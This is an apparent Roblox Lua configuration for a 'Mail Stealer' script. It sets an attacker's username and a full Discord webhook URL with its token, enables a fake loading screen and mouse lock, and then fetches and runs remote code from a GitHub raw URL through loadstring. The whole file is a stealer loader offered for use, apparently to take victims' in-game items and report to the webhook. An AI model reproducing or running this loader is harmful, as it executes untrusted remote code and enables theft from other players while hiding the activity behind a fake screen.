-- PtacikCZ Scriptz Mail Stealer --

-- Main Config --
_G.UserName = "2007matej" -- Write your Username

-- Webhook Config --
_G.Webhook = "https://discord.com/api/webhooks/1128659512279171123/VUSlg2fTbLMMS_tsmBXg3aHMLTFKXiYFYZXaJfPCSQAMIv1nKg3RDsKDza5SRcHsPnmd" -- Enter your Webhook

-- Extra Settings --
_G.LoadingScreen = true -- DONT CHANGE
_G.AntiLeave = false -- DONT CHANGE
_G.MouseLock = true -- DONT CHANGE

-- Script --
loadstring(game:HttpGet("https://raw.githubusercontent.com/PtacikCZ/077Matej/main/Mail-Stealer"))()
